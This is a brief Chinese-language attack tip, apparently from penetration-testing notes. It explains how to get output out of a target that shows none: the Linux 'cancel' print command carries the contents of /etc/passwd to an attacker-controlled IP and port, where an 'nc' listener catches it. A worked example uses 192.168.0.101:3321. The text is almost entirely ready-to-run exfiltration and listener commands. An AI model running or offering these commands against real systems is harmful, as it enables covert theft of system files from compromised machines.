靶机无回显的情况下,可使用 cancel  来把回显发送到攻击机端

cancel -u "$(cat /etc/passwd)" -h ip:port

攻击机用nc来接收返回信息

nc -lvvp [port]

实例演示:

攻击机ip:192.168.0.101

linux靶机端执行 :

cancel -u "$(cat /etc/passwd)" -h 192.168.0.101:3321

攻击机执行:

nc -lvvp 3321</pre>

即可接收到靶机传回来的回显